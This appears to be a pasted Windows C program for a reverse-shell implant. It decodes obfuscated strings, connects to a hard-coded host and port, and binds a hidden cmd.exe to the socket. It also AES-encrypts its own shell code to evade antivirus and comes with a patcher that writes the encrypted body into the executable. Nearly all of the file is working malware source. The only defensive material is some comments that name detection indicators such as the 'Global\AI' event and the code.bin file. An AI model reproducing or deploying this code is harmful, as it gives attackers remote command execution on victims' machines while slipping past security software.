DunningKruger

aes

Sep 7th, 2021 (edited)
  1. // Self-encrypted (AES-256) plus reverse shell payload to 127.0.0.1:666. Run Netcat: nc -lvvp 666
  2. // Some strings encrypted with https://www.stringencrypt.com (v1.4.0) [C/C++].
  3.  
  4. // MSVC Settings
  5. // -------------
  6. // Properties -> C/C++  -> Optimization    -> Disabled (/Od)
  7. // Properties -> C/C++  -> Code Generation -> Security Check -> Disable Security Check (/GS-)
  8. // Properties -> C/C++  -> Code Generation -> Runtime Library -> Multi-threaded (/MT)
  9. // Properties -> Linker -> Advanced        -> Randomized Base Address -> No (/DYNAMICBASE:NO)
  10. // Properties -> Linker -> Command Line    -> /SECTION:.text,RWE /SUBSYSTEM:WINDOWS /pdbaltpath:%_PDB%  
  11.  
  12.  
  13. #define _CRT_SECURE_NO_DEPRECATE
  14. #define _WINSOCK_DEPRECATED_NO_WARNINGS
  15.  
  16. #include <winsock2.h>
  17. #include <windows.h>
  18. #include <ws2tcpip.h>
  19. #include <wincrypt.h>
  20. #include <stdio.h>
  21.  
  22. #pragma comment(lib, "Ws2_32.lib")
  23.  
// Sizes used by the CryptoAPI AES-256 path in AES256(): 32-byte key, 16-byte block.
// IV_SIZE is defined but not referenced anywhere below (the IV array is sized by its initializer).
#define AES_KEY_SIZE   32
#define IV_SIZE        16
#define AES_BLOCK_SIZE 16
// Delay in milliseconds used by begin_shell() after a completed session.
#define ONE_SEC        1000
// Emits a single 0x90 (x86 NOP) byte via MSVC inline asm; used once in begin_shell().
#define nop            __asm _emit 0x90
  29.  
// In-memory layout of a CryptoAPI PLAINTEXTKEYBLOB for AES-256 as handed to CryptImportKey()
// in AES256(): a BLOBHEADER, the key length in bytes, then the raw key material.
typedef struct AES256KEYBLOB_ {
    BLOBHEADER hdr;               // bType/bVersion/reserved/aiKeyAlg; filled in by AES256()
    DWORD      len;               // set to AES_KEY_SIZE (32) by AES256()
    BYTE       key[AES_KEY_SIZE]; // raw key bytes; copied from the hard-coded aes_key in AES256()
} AES256KEYBLOB;
  35.  
  36.  
  37. // -------------- Begin Body --------------
  38.  
// Reverse-shell body: connects to 127.0.0.1:666 and hands the socket to cmd.exe as its
// stdin/stdout/stderr, retrying forever. The bytes of this function (from begin_shell up to
// end_shell) are what AES256() encrypts/decrypts in place, so the two symbols must stay
// adjacent in the final image. Never returns on its own.
// Detection angles visible in this code: a cmd.exe child whose standard handles are a socket,
// repeated TCP connects to loopback port 666, and a parent that blocks until cmd.exe exits.
void begin_shell()
{
    USHORT C2Port = 666;   // Hard-coded destination port (matches the "nc -lvvp 666" note in the header).

    // C2Server = "127.0.0.1"
    // Stored obfuscated: every byte is the plaintext byte + 1 (so 0x2F -> '.', 0x01 -> NUL).
    unsigned char C2Server[10];

    C2Server[7] = 0x2F; C2Server[1] = 0x33; C2Server[3] = 0x2F; C2Server[9] = 0x01;
    C2Server[2] = 0x38; C2Server[5] = 0x2F; C2Server[8] = 0x32; C2Server[0] = 0x32;
    C2Server[4] = 0x31; C2Server[6] = 0x31;

    // Decode: subtract 1 from each byte, yielding "127.0.0.1\0".
    for (unsigned int tauWy = 0, pcvuf = 0; tauWy < 10; tauWy++)
    {
        pcvuf = C2Server[tauWy];
        pcvuf--;
        C2Server[tauWy] = pcvuf;
    }

    // Process = "cmd.exe"
    // Stored obfuscated: byte i is the plaintext byte minus i. The terminator is 0xF9 + 7 = 0x100,
    // which truncates to 0 when stored back into the unsigned char array.
    unsigned char Process[8];

    Process[5] = 0x73; Process[7] = 0xF9; Process[4] = 0x61; Process[6] = 0x5F;
    Process[0] = 0x63; Process[3] = 0x2B; Process[1] = 0x6C; Process[2] = 0x62;

    // Decode: add the index to each byte, yielding "cmd.exe\0".
    for (unsigned int Fyrjn = 0, nVmGF = 0; Fyrjn < 8; Fyrjn++)
    {
        nVmGF = Process[Fyrjn];
        nVmGF += Fyrjn;
        Process[Fyrjn] = nVmGF;
    }

    // Persist until terminated.
    // Each pass initializes Winsock, connects, and on success blocks in WaitForSingleObject
    // until the spawned cmd.exe ends. Winsock is torn down again on every pass.
    while (1)
    {
        SOCKET clientSocket;
        struct sockaddr_in addr;
        WSADATA version;

        if (WSAStartup(MAKEWORD(2, 2), &version) != 0) {
            continue;   // Skips the Sleep() at the bottom: retried without delay.
        }

        // Return value is not checked (INVALID_SOCKET would be passed on to WSAConnect).
        clientSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = inet_addr(C2Server);   // decoded "127.0.0.1"
        addr.sin_port = htons(C2Port);

        if (WSAConnect(clientSocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR)
        {
            closesocket(clientSocket);
            WSACleanup();
            continue;   // Also skips Sleep(): a refused connect is retried immediately.
        }
        else
        {
            STARTUPINFOA sinfo;
            PROCESS_INFORMATION pinfo;
            memset(&sinfo, 0, sizeof(sinfo));
            sinfo.cb = sizeof(sinfo);
            // wShowWindow stays 0 from the memset, i.e. SW_HIDE: the shell window is hidden.
            sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
            // The socket becomes the child's standard handles; bInheritHandles=TRUE below makes
            // the handle usable from cmd.exe.
            sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)clientSocket;
            // Avoid AV signatures?
            nop
            // Return value not checked: if CreateProcessA fails, pinfo is uninitialized when
            // the handles below are waited on and closed.
            CreateProcessA(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
            WaitForSingleObject(pinfo.hProcess, INFINITE);   // Blocks until the shell process exits.
            CloseHandle(pinfo.hProcess);
            CloseHandle(pinfo.hThread);
            closesocket(clientSocket);
            WSACleanup();
        }

        Sleep(ONE_SEC);   // Only reached after a completed session, not after a failed connect.
    }
}
  114.  
  115. // -------------- End Body --------------
  116.  
  117.  
// End marker for the encrypted region, never meant to be called: a naked function whose body
// is 16 literal bytes, four repeats of 8B AD F0 0D. Read as a big-endian DWORD by WinMain()
// this is 0x8BADF00D, which signals "body still in plaintext". AES256() also uses the address
// of this symbol as the end of the region to encrypt/decrypt, and in encrypt mode the padding
// block and the code.bin dump can extend into these 16 bytes.
__declspec(naked) void end_shell(void)
{
    // The ciphertext Body is up to a block length (16 bytes) larger than the plaintext.
    __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
    __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
    __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
    __asm _emit 0x8B __asm _emit 0xAD __asm _emit 0xF0 __asm _emit 0x0D
}
  126.  
  127.  
// Encrypts (bEncrypt == TRUE) or decrypts (FALSE) the code bytes between begin_shell and
// end_shell in place using CryptoAPI AES-256, and in encrypt mode also dumps the result to
// the file "code.bin" in the current directory.
// The key and IV are hard-coded literals below, so this is obfuscation, not protection:
// anyone holding the binary has both and can recover the body offline.
// Writing to the function's own bytes only works with the writable .text section from the
// build notes at the top of the file. No CryptoAPI, fopen or fwrite result is checked.
void AES256(BOOL bEncrypt)
{
    DWORD         body_len;
    size_t        body_size;
    LPBYTE        body_data;
    DWORD         aes_num_blocks;
    HCRYPTKEY     hKeyDuplicate;
    boolean       final;
    HCRYPTPROV    hProv;
    HCRYPTKEY     hKey;
    AES256KEYBLOB AESBlob;

    // Shhh...it's a secret!
    // 32-byte key: ASCII "1111222233334444555566667777 8888" pattern, embedded in the binary.
    BYTE aes_key[] = { 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32,
                       0x33, 0x33, 0x33, 0x33, 0x34, 0x34, 0x34, 0x34,
                       0x35, 0x35, 0x35, 0x35, 0x36, 0x36, 0x36, 0x36,
                       0x37, 0x37, 0x37, 0x37, 0x38, 0x38, 0x38, 0x38 };

    // 16-byte IV: ASCII "1111222233334444", also fixed.
    BYTE iv[] = { 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32,
                  0x33, 0x33, 0x33, 0x33, 0x34, 0x34, 0x34, 0x34 };

    // Build a PLAINTEXTKEYBLOB so the raw key can be imported without a key exchange.
    memset(&AESBlob, 0, sizeof(AESBlob));
    AESBlob.hdr.bType = PLAINTEXTKEYBLOB;
    AESBlob.hdr.bVersion = CUR_BLOB_VERSION;
    AESBlob.hdr.reserved = 0;
    AESBlob.hdr.aiKeyAlg = CALG_AES_256;
    AESBlob.len = AES_KEY_SIZE;
    memcpy(AESBlob.key, aes_key, AES_KEY_SIZE);

    // CRYPT_VERIFYCONTEXT: ephemeral context, no persisted key container.
    CryptAcquireContextA(&hProv, NULL, MS_ENH_RSA_AES_PROV_A, PROV_RSA_AES, CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
    CryptImportKey(hProv, (LPBYTE)&AESBlob, sizeof(AES256KEYBLOB), 0, CRYPT_NO_SALT, &hKey);
    CryptSetKeyParam(hKey, KP_IV, iv, 0);   // Duplicates taken from hKey below inherit this IV.

    // Region bounds come from symbol addresses; this assumes the linker kept begin_shell and
    // end_shell in source order with nothing in between (the /Od build note) — verify per build.
    body_size = (LPBYTE)end_shell - (LPBYTE)begin_shell;
    body_data = (LPBYTE)begin_shell;

    aes_num_blocks = body_size / AES_BLOCK_SIZE;   // Whole blocks only; a trailing partial block is left untouched.

    while (aes_num_blocks != 0)
    {
        // A fresh key duplicate per block: presumably so chaining state restarts from the IV
        // on every block instead of carrying across the loop — TODO confirm; if so, each block
        // is transformed independently under the same IV.
        CryptDuplicateKey(hKey, NULL, 0, &hKeyDuplicate);
        final = (aes_num_blocks == 1) ? TRUE : FALSE;   // Only the last block is marked Final (padding added/stripped).
        body_len = AES_BLOCK_SIZE;
        if (bEncrypt)
        {
            // dwBufLen is two blocks: on the Final block CryptEncrypt appends a padding block,
            // which lands in the 16 bytes after the last whole block (the body tail or the
            // start of end_shell). This is the "up to a block larger" noted on end_shell.
            CryptEncrypt(hKeyDuplicate, 0, final, 0, body_data, &body_len, AES_BLOCK_SIZE * 2);
        }
        else
        {
            CryptDecrypt(hKeyDuplicate, 0, final, 0, body_data, &body_len);
        }
        CryptDestroyKey(hKeyDuplicate);
        body_data += AES_BLOCK_SIZE;
        aes_num_blocks--;
    }

    CryptDestroyKey(hKey);
    CryptReleaseContext(hProv, 0);

    if (bEncrypt)
    {
        // code_bin = "code.bin"
        // Plain ASCII held as a byte array rather than a string literal (no transform applied).
        BYTE code_bin[] = { 0x63, 0x6f, 0x64, 0x65, 0x2e, 0x62, 0x69, 0x6e, 0x00 };
        // mode = "wb"
        BYTE mode[] = { 0x77, 0x62, 0x00 };

        // Write encrypted Body to code.bin
        // Dumps body_size + one block so the padding block is included; the dump therefore also
        // covers the first 16 bytes of end_shell. A NULL pFile (fopen failure) is not handled.
        // Host IoC: a file named code.bin appearing next to the process's working directory.
        body_data = (LPBYTE)begin_shell;
        FILE* pFile = fopen(code_bin, mode);
        fwrite(body_data, sizeof(char), body_size + AES_BLOCK_SIZE, pFile);
        fclose(pFile);
    }
}
  201.  
  202.  
// Single-instance guard built on a named event in the Global namespace.
// Returns TRUE if the event already existed (another instance is running), FALSE if this call
// created it or if CreateEventA failed. On the FALSE path the handle is never closed, so the
// event outlives this function for the rest of the process — presumably intentional, since
// that is what lets later instances observe ERROR_ALREADY_EXISTS.
// Host IoC: the named event "Global\AI".
BOOL AlreadyRunning()
{
    // szMutex = "Global\\AI"
    // Stored obfuscated: byte i is the plaintext byte XOR i (0x09 ^ 9 = NUL terminator).
    unsigned char szMutex[10];

    szMutex[9] = 0x09; szMutex[1] = 0x6D; szMutex[0] = 0x47; szMutex[6] = 0x5A;
    szMutex[8] = 0x41; szMutex[5] = 0x69; szMutex[3] = 0x61; szMutex[4] = 0x65;
    szMutex[7] = 0x46; szMutex[2] = 0x6D;

    // Decode: XOR each byte with its index, yielding "Global\AI\0".
    for (unsigned int vZunm = 0, sGnrH = 0; vZunm < 10; vZunm++)
    {
        sGnrH = szMutex[vZunm];
        sGnrH ^= vZunm;
        szMutex[vZunm] = sGnrH;
    }

    // Despite the variable name this is an event, not a mutex; only its name is used.
    HANDLE  hStartEvent = CreateEventA(NULL, FALSE, FALSE, szMutex);

    if (hStartEvent == NULL)
    {
        return FALSE;   // Creation failed (e.g. no rights to the Global namespace): treated as "not running".
    }

    if (GetLastError() == ERROR_ALREADY_EXISTS)
    {
        CloseHandle(hStartEvent);
        return TRUE;
    }

    return FALSE;   // Handle intentionally kept open for the process lifetime.
}
  234.  
  235.  
// Entry point (GUI subsystem, so no console is created). All parameters are unused.
// The first 4 bytes of end_shell act as a state marker: if, byte-swapped, they still read
// 0x8BADF00D the body is in plaintext, so this is the build-time run that encrypts it and
// writes code.bin. Otherwise the body is treated as already encrypted, decrypted in place and
// executed. The commented-out patcher at the bottom of the file is what writes code.bin back
// into the executable; whether that also replaces the marker bytes depends on body_size and
// is not verified here — TODO confirm.
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpszCmdLine, _In_ int nCmdShow)
{
    if (!AlreadyRunning())
    {
        // Read the marker as a DWORD from code memory and swap to big-endian for comparison.
        DWORD ate_bad_food = _byteswap_ulong(*(LPDWORD)end_shell);

        if (ate_bad_food != 0x8BADF00D)
        {
            // Decrypt Body
            // Runtime path: rewrites begin_shell's bytes in place, then jumps into them.
            AES256(FALSE);

            begin_shell();
        }
        else
        {
            // Encrypt Body
            // Build-time path: encrypts in place and dumps to code.bin; nothing is executed.
            AES256(TRUE);
        }
    }

    return 0;
}
  258.  
  259.  
  260.  
  261.  
  262. /*
  263.  
  264. // Patch payload file code.bin to aes.exe offset: 0000:0400  ...
  265.  
  266. #define _CRT_SECURE_NO_DEPRECATE
  267. #define _WINSOCK_DEPRECATED_NO_WARNINGS
  268.  
  269. #include <stdio.h>
  270. #include <stdlib.h>
  271.  
  272. int main()
  273. {
  274.     FILE* fpc = fopen("code.bin", "rb");
  275.     fseek(fpc, 0, SEEK_END);
  276.     unsigned long len = ftell(fpc);
  277.     unsigned char* buffer = malloc(len);
  278.     rewind(fpc);
  279.     fread(buffer, 1, len, fpc);
  280.     fclose(fpc);
  281.  
  282.     FILE* fp = fopen("aes.exe", "r+b");
  283.     fseek(fp, 0x400, SEEK_SET);
  284.     fwrite(buffer, 1, len, fp);
  285.     free(buffer);
  286.     fclose(fp);
  287.  
  288.     return 0;
  289. }
  290.  
  291. */
  292.  